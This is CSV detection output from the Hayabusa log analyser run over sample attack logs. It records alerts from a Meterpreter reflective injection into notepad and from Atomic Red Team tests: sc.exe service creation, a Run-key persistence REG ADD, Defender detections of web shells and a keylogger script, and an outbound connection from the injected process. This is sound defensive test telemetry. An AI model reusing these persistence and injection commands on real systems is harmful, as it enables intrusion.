2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.207 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.239 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\notepad.exe"" | LID: 0x135ca | PID: 2328 | PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\system32\notepad.exe | Tgt Process: C:\Windows\system32\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1632 | Src PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00 | Tgt PID: 2328 | Tgt PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:31.707 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49159 (IEWIN7) | Dst: 10.0.2.18:8181 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\rundll32.exe | PID: 2328 | PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:PowerShell/Powersploit.M | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:XML/Exeselrun.gen!A | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: HackTool:JS/Jsprat | Severity: High | Type: Tool | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Backdoor:ASP/Ace.T | Severity: Severe | Type: Backdoor | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:Win32/Sehyioa.A!cl | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: HackTool:JS/Jsprat | Severity: High | Type: Tool | User: MSEDGEWIN10\IEUser | Path: containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 23:42:51.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 4516 288 0000023C0CA21C70 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5828 | PGUID: 747F3D96-D6EB-5D31-0000-0010E0252500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:42:53.295 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x50951 | PID: 3764 | PGUID: 747F3D96-D6ED-5D31-0000-0010C88A2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x50951 | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:43:46.623 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\phvj2yfb\phvj2yfb.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:43:46.623 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.161 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4216 | PGUID: 747F3D96-D738-5D31-0000-001046A02600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" | LID: 0x50951 | PID: 1700 | PGUID: 747F3D96-D738-5D31-0000-001098A22600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,low,Persis | PrivEsc,New Service Creation,,rules/sigma/process_creation/proc_creation_win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.268 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2556 | PGUID: 747F3D96-D738-5D31-0000-001056A62600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.288 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe start AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" | LID: 0x50951 | PID: 4260 | PGUID: 747F3D96-D738-5D31-0000-0010D8AA2600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.307 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6188 | PGUID: 747F3D96-D738-5D31-0000-00105CAC2600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.150 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D739-5D31-0000-00104CB72600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe stop AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D739-5D31-0000-0010B6B92600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,low,Impact,Stop Windows Service,,rules/sigma/process_creation/proc_creation_win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.253 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4744 | PGUID: 747F3D96-D739-5D31-0000-0010E4BB2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.278 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe delete AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" | LID: 0x50951 | PID: 2884 | PGUID: 747F3D96-D739-5D31-0000-001046BE2600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.351 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6896 | PGUID: 747F3D96-D739-5D31-0000-0010B2C22600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:32.101 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 5348 | PGUID: 747F3D96-D750-5D31-0000-0010B9F82600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6584 | PGUID: 747F3D96-D765-5D31-0000-001027B72800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" | LID: 0x50951 | PID: 2068 | PGUID: 747F3D96-D765-5D31-0000-001086B92800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Persis,Direct Autorun Keys Modification,,rules/sigma/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Run key | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\Windows\CurrentVersion\Run\Atomic Red Team: C:\Path\AtomicRedTeam.exe | Process: C:\Windows\system32\reg.exe | PID: 2068 | PGUID: 747F3D96-D765-5D31-0000-001086B92800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.330 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5824 | PGUID: 747F3D96-D765-5D31-0000-0010D7BD2800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.349 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" | LID: 0x50951 | PID: 2912 | PGUID: 747F3D96-D765-5D31-0000-001022C02800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
